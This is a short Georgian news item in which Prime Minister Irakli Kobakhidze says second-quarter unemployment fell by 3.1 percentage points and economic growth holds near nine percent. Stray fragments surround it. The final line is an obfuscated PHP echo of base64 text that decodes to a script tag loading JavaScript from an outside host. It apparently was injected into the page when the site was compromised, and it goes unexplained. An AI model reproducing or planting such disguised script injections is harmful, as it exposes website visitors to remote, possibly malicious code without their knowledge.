celsiusi
ავერსი შნაიდერი

 გამოქვეყნდა მეორე კვარტლის მონაცემები და 3.1 პროცენტული პუნქტით არის შემცირებული უმუშევრობის დონე, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი კობახიძემ ჟურნალისტებს განუცხადა.

როგორც პრემიერმა აღნიშნა, საქართველოში არის მაღალი ეკონომიკური ზრდა და მიმდინარე წელსაც ნარჩუნდება ცხრაპროცენტიანი ეკონომიკური ზრდის მაჩვენებელი.

„ასეთ პირობებში, რა თქმა უნდა, ზრდა პირდაპირ აისახება დასაქმებაზე, უმუშევრობის დონის შემცირებაზე. ეს არის, რაც სჭირდება ჩვენს ხალხს, საზოგადოებას. სამწუხაროდ, მთელი ჩვენი პოლიტიკური დისკუსია გადართულია რაღაც ვიწრო პოლიტიკურ საკითხებზე, რომლებიც არ არის არსებითად საინტერესო მოსახლეობისთვის, არ ეხება მოსახლეობის ცხოვრების დონის გაუმჯობესებას. პარალელურ რეჟიმში, მთელი ჩვენი საქმიანობა მიმართული გვაქვს იქითკენ, რომ შევინარჩუნოთ მაღალი ეკონომიკური ზრდის ტემპი, შევამციროთ უმუშევრობა ქვეყანაში, დავასაქმოთ მეტი ადამიანი და გვაქვს კონკრეტული შედეგები, რაც არის ასახული არა მარტო სტატისტიკაში, არამედ უმუშევრობის შემცირება, დასაქმების ზრდა შემდეგ პირდაპირ აისახება სახელმწიფო ბიუჯეტზე. ახალი დასაქმებული ადამიანები პირდაპირ იხდიან სახელმწიფო ბიუჯეტში საშემოსავლო გადასახადს. შესაბამისად, დასაქმების ზრდასთან ერთად, იზრდება სახელმწიფო ბიუჯეტი. ეს არის, რაც სჭირდება ჩვენს ქვეყანას“, – განაცხადა პრემიერმა.

104
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");